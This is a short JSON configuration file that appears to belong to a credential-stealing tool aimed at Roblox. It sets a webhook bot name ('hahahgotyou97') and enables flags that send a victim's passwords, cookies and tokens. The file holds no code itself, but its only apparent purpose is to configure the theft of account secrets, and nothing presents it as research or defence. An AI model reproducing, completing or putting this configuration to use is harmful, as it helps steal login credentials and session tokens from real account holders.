{
    "Title_Configs":[
        {

           "name": "hahahgotyou97",
           "servername": "kirbyfrr",
           "program": "roblox"

        }
    ],

    "Webhook_config":[
        {

          "Bot_Name": "hahahgotyou97",
          "Bot_Avatar": "https://www.roblox.com/users/5208193228/profile"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}
